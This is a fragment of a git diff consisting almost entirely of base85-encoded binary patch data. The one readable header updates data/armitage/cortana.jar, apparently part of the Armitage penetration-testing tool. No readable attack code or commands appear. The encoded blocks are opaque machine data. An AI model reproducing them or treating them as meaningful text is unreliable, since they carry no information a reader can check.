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 T^;M&*My(bZ8faRC!9D*2!Nv77 diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 94bebc6eac43b16d820a1027fa953a2b29c78b68..7c1da6dbfa1c3265b31fcf73b613ad13d5c408e0 100644 GIT binary patch delta 119438 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�HkbeOjgI7Q_eR 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 